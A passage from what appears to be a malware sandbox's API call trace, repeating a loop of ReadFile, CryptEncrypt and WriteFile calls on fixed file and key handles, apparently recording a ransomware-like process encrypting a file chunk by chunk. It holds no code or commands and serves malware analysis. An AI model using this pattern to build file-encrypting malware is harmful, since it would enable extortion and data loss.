returned 1 [0281.131] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.131] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.131] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.131] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.131] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.132] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.132] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.132] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.132] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.132] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.132] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.133] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.133] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.133] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.133] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.133] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.134] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.134] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.134] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.134] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.134] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.134] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.135] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.135] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.135] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.135] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.135] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.136] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.136] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.136] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.136] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.136] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.137] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.137] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.137] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.137] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.137] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.138] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.138] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.138] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.138] ReadFile (in: 